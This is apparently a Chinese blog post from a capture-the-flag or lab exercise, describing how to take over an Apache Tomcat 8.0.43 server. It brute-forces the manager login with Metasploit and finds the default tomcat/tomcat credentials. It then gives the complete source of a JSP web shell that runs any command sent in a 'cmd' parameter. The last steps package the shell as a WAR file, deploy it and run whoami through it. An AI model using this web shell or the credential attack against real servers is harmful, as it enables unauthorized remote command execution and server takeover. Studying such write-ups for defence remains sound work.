Tomcat-pass-getshell

Posted 2021-04-04 青时小破栈

1.tomcat8.0.43版本

2.MSF爆破密码

爆破成功密码是 tomcat tomcat 默认密码

    成功进入 Tomcat web应用程序管理界面了，下面让我们开始部署 War包，Getshell！！！

       3.Getshell

      (1).首先创建一个名为index.jsp的文件，并写入以下内容：

<%@ page import="java.util.*,java.io.*"%>

<html><BODY>

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

        out.println("Command: " + request.getParameter("cmd") + "<BR>");

        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

        OutputStream os = p.getOutputStream();

        InputStream in = p.getInputStream();

        DataInputStream dis = new DataInputStream(in);

        String disr = dis.readLine();

        while ( disr != null ) {

                out.println(disr);

                disr = dis.readLine();

                }

        }

%>

</pre>

</BODY></HTML> 

   (2).写入完成，开始将该文件压缩为zip文件,然后我们要将，.zip后缀名改为.war,点击List Applications 模块，上传war包

  (3).这个时候，我们需要访问这个文件，以我的示例来说，我要访问的路径为x.x.x.x:20134/test/index.jsp?cmd=whoami，这个相对路径，即使你部署war的路径，index.jsp是我最开始编写代码的文件，这是都可以根据你自己来更改.

  (4).拿到flag